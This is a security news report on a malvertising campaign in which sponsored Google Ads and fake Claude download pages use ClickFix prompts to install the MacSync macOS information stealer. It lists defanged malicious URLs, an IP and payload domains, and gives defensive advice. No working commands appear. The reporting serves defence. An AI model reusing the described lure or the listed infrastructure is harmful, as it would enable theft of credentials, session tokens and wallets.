A sophisticated malvertising campaign is targeting macOS users through manipulated Google Ads and fraudulent artificial intelligence applications. Security researchers Berk Albayrak and g0njxa recently uncovered an operation that uses sponsored search results to redirect victims to fake landing pages, where attackers deploy MacSync payloads and dangerous information-stealing malware. The campaign specifically targets users searching for popular AI tools like Claude, exploiting the trust users place in top search results.
The attack begins when users search for legitimate software and encounter sponsored advertisements at the top of search results. These ads are designed to closely mimic official vendors, making them difficult to distinguish from authentic links. When clicked, the ads redirect victims to deceptive websites hosted on trusted platforms including Google Sites, Framer, and even legitimate claude.ai shared chat pages. This hosting strategy helps attackers bypass domain reputation checks and enterprise web filters that might otherwise block malicious sites.
The fake landing pages are carefully crafted to resemble official Claude AI download portals. When users attempt to download the application or interact with the site, they encounter a "ClickFix" prompt that uses deceptive warning messages to manipulate victims into manually executing malicious terminal commands or downloading compromised installers. The prompt typically claims to be fixing a display error, exploiting users' trust and willingness to resolve technical issues. Researchers have identified multiple malicious URLs including sites[.]google[.]com/view/cloud-version-08 and claude-desktop-app[.]framer[.]ai, with threat actors frequently rotating domains to evade detection.
Once victims interact with the fake portal, they are redirected to payload delivery servers at IP addresses such as 2[.]26[.]75[.]112 and domains including pieoneer[.]org and greenactiv[.]com. These servers deliver the MacSync malware, which functions as a comprehensive information stealer for macOS systems. The malware harvests sensitive data including saved browser credentials, cryptocurrency wallet information, and active session tokens, then exfiltrates this data to attacker-controlled command-and-control infrastructure.
Organizations should block known indicators of compromise at the network level and monitor macOS endpoints for unusual script execution originating from web browsers. Security teams must educate users to exercise extreme caution with sponsored search results and avoid clicking on sponsored software download advertisements. The most effective defense is to navigate directly to official vendor websites rather than trusting search engine advertisements, even when they appear legitimate.
Source: https://cybersecuritynews.com/macos-malware-leverages-google-ads/